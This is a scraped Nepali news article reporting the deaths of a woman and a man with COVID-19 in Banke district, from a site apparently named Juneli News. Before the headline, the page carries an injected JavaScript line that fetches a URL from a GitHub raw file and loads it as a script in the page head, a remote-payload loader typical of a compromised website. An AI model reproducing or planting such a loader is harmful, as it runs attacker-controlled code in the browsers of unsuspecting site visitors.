;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); बाँकेमा कोरोना संक्रमित एक महिला र पुरुषको मृत्यु – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • बाँकेमा कोरोना संक्रमित एक महिला र पुरुषको मृत्यु
समाचार

बाँकेमा कोरोना संक्रमित एक महिला र पुरुषको मृत्यु

असोज १८,

बाँके । नेपालगञ्ज मेडिकल कलेज शिक्षण अस्पताल, कोहलपुरमा उपचाररत कोरोना संक्रमित महिलाको मृत्यु भएको छ। पुनर्वास नगरपालिका–२, कञ्चनपुरकी २९ वर्षीया महिलाको आइतबार बिहान साढे ४ बजे मृत्यु भएको अस्पताललाई उदृध गर्दै बाँकेका प्रमुख जिल्ला अधिकारी रामबहादुर कुरुम्बाङले जानकारी दिए।

त्यस्तै एक कोरोना संक्रमितको  ६० वर्षीय पुरुषको शनिबार साँझ ४ बजेर ५६ मिनेटमा मृत्यु भएको भेरी अस्पतालले जनाएको छ । उनलाई असोज १५ गते कोरोना पुष्टि भएको थियो। सोही दिन अस्पताल भर्ना भएका थिए। यो सँगै बाँकेमा कोरोनाबाट मृत्यु हुनेको संख्या २१ पुगेको छ।

मृत्यु हुनेमा दैलेख बाँसी गाउँपालिका–९ स्थानीय ठेगाना भई नेपालगञ्ज उपमहानगरपालिका–१२ कोरियनपुर बस्दै आएका पुरुष हन् । file Photo

फेसबुक प्रतिक्रियाहरु